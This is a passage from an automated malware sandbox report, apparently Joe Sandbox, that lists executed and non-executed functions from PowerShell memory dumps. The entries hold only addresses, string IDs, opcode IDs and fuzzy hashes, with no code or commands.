                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_^4$N_^7$N_^F$N_^J
                                                                    • API String ID: 0-3508309026
                                                                    • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                    • Instruction ID: 76e74cc2789b1994d237be30e67308376eef35d5054b1cd0edc6f5241bd7a9cc
                                                                    • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                    • Instruction Fuzzy Hash: 6D2126B7B088266FD3117BFDBC255EE3B44DF9523874902B2D298DB143E914709A8AC2

                                                                    Executed Functions

                                                                    Function 00007FFD347895D3 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-856455061
                                                                    • Opcode ID: b902d7c93624e10a1ad7713f755a79aa94881159142300c17ef91e2a16f2603c
                                                                    • Instruction ID: a9794d36a781eb28f178a8692c447723067e02eaeb4d44fdaabc61060eca4b4b
                                                                    • Opcode Fuzzy Hash: b902d7c93624e10a1ad7713f755a79aa94881159142300c17ef91e2a16f2603c
                                                                    • Instruction Fuzzy Hash: 47A127B2A0EBC59FE756976C5C6A1A97FA0EF53221F0801FBD1D8C70D3D918A805C782
                                                                    Function 00007FFD34786435 Relevance: .7, Instructions: 726COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a37ed6d0201d3a122ddb032800006a76d9d1fc91743fbafd0b364af906f84ac
                                                                    • Instruction ID: 98fdd26a28ce259d983e0dedb26f1bbe25e7f649067259ae567d8cb3fb6402fa
                                                                    • Opcode Fuzzy Hash: 7a37ed6d0201d3a122ddb032800006a76d9d1fc91743fbafd0b364af906f84ac
                                                                    • Instruction Fuzzy Hash: 2AD16E70A08A4D8FDF95DF58C4A5AAD77E1FF69301F14416AD40DD72A6CA38E881CBC1
                                                                    Function 00007FFD34854073 Relevance: .2, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9d67c989d29bdcb84d87c9ccc8afcadd5ec7c12466acc2e668abe6bbd762f2d
                                                                    • Instruction ID: 38c571e17c193dfbe94f00782904688004bf542e3987e6a9bcfaece2a495beae
                                                                    • Opcode Fuzzy Hash: c9d67c989d29bdcb84d87c9ccc8afcadd5ec7c12466acc2e668abe6bbd762f2d
                                                                    • Instruction Fuzzy Hash: B9510533B4DA5A4FE7E9AB1D44A16B477D2EF96620B5800FAC24EC7293DD28EC058341
                                                                    Function 00007FFD348540BF Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fca0294730a3906e58795a148692095ef477cc84e740793a90eeed34384f46d
                                                                    • Instruction ID: 89734c3fab33e81126894573f003d3a4fe86e3cd82ce677f414979ecfefd037c
                                                                    • Opcode Fuzzy Hash: 2fca0294730a3906e58795a148692095ef477cc84e740793a90eeed34384f46d
                                                                    • Instruction Fuzzy Hash: 7B412633B4DA5A4FE7A9EB1D54A16B477D2EF56620B1800FBD24EC72A3DE18EC058341
                                                                    Function 00007FFD3466EB80 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2698090417.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd3466d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b743d13c7119408abe96f95a26b77876a643159ca4474ee317162074bc0b02c1
                                                                    • Instruction ID: 777fe191c56229496d54fb7e42a731b731e5255c657b9f6faeb9e0940f42c7f7
                                                                    • Opcode Fuzzy Hash: b743d13c7119408abe96f95a26b77876a643159ca4474ee317162074bc0b02c1
                                                                    • Instruction Fuzzy Hash: 0341437190EBC44FE7568B28D8959A63FF0EF53320B1501EFD089CB1A3D62DA806C792
                                                                    Function 00007FFD348543CA Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9bd01a2710e857012a031a3945789c13f43a7eaa9898dc234edd382c68592319
                                                                    • Instruction ID: b07af49addb4cd9f12ed89c5385dcfe44999ea54446fdd9f76815509426a2b64
                                                                    • Opcode Fuzzy Hash: 9bd01a2710e857012a031a3945789c13f43a7eaa9898dc234edd382c68592319
                                                                    • Instruction Fuzzy Hash: 47312632B0DA494FE7A4E75CA4A1AF877E1EF85620B1800FBC24DC31A3DA19EC11C380
                                                                    Function 00007FFD3478A4BC Relevance: .1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f9d0f3c2e831395b15c0094210f4a9fb1306f3d97ff1d14601ecfa005c1a75a
                                                                    • Instruction ID: 659a15287473ed1cd860ddbbcf2b3b94f8821aca2441e243acee92c87a406a97
                                                                    • Opcode Fuzzy Hash: 9f9d0f3c2e831395b15c0094210f4a9fb1306f3d97ff1d14601ecfa005c1a75a
                                                                    • Instruction Fuzzy Hash: 96214B3090C74C8FDB59DB6C984A7E97FE0EB96321F00415BD048C3152DA74A816CB91
                                                                    Function 00007FFD3485681E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac9cf3f62fa8e73728c76a19b0ce3397967c02cf0b33475fbf2502c22425fd1a
                                                                    • Instruction ID: 5a31647b026f130c176bdf82f97337cff45cb2b1a7a901c642f2add91a8235b1
                                                                    • Opcode Fuzzy Hash: ac9cf3f62fa8e73728c76a19b0ce3397967c02cf0b33475fbf2502c22425fd1a
                                                                    • Instruction Fuzzy Hash: 68112332B0D6894FEB95DF9840E41A87BD1EF1A310F0800FFC64DEB193DA28A844D310
                                                                    Function 00007FFD347833B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: e35d54fb46a0325d3c9533a66cc66369ca9705c70068c201e4045385024973ef
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: D301677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                    Function 00007FFD347878ED Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 806ad45e011e45360578c44f0a075df6e164f65d625abcd572281e14b53d1ff7
                                                                    • Instruction ID: d7d18e0d2c1f4f82a6e061ce34b35c843356f6aaf2f050a98fbb70c72b6a099f
                                                                    • Opcode Fuzzy Hash: 806ad45e011e45360578c44f0a075df6e164f65d625abcd572281e14b53d1ff7
                                                                    • Instruction Fuzzy Hash: CEE07D2070C6814FC340822894517F97B819FC5301F40087CF0CEC3383C54C68415392

                                                                    Non-executed Functions

                                                                    Function 00007FFD347889F2 Relevance: 7.6, Strings: 6, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^$M_^$M_^$M_^$M_^$M_^
                                                                    • API String ID: 0-3353809593
                                                                    • Opcode ID: 7fe8ab23ca5cffe666c1119405e671e23474920c241c66196c3844d5085dafb9
                                                                    • Instruction ID: 29d082a006520fb762e9cdb0c5090f0c3820ba5e2c35867ebc33f1f6f4fc4936
                                                                    • Opcode Fuzzy Hash: 7fe8ab23ca5cffe666c1119405e671e23474920c241c66196c3844d5085dafb9
                                                                    • Instruction Fuzzy Hash: 763188E3B0D682ABE2EA06294CA70967BD4EF2335570A03F5C694CB1D3FD5C6C035192
                                                                    Function 00007FFD34788BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                    • API String ID: 0-962139525
                                                                    • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction ID: 6ee93f0a4304a5c5048fde7c0ab53bc99d3155f9f9a09ac8c2a541ffee2ce9ab
                                                                    • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction Fuzzy Hash: 4021F9B37049169BD21136BCB8529ED7784DF5537938603F3E128DF153ED18649B8AC1
                                                                    Function 00007FFD347885FA Relevance: 5.1, Strings: 4, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^$M_^$M_^$M_^
                                                                    • API String ID: 0-2235110077
                                                                    • Opcode ID: 24d7a85204b357b1e3b87c6ed052224ccada4ef5cf174532814df972b0eff1e7
                                                                    • Instruction ID: e719589e233b951245f10fe73f9c851df3e7dfde07c440414de18cbaa106c2dc
                                                                    • Opcode Fuzzy Hash: 24d7a85204b357b1e3b87c6ed052224ccada4ef5cf174532814df972b0eff1e7
                                                                    • Instruction Fuzzy Hash: BA3145A6E0E7C2AFE6A3422558BA0963FD0EF1323474A15F7C595C7093ED1D2847A352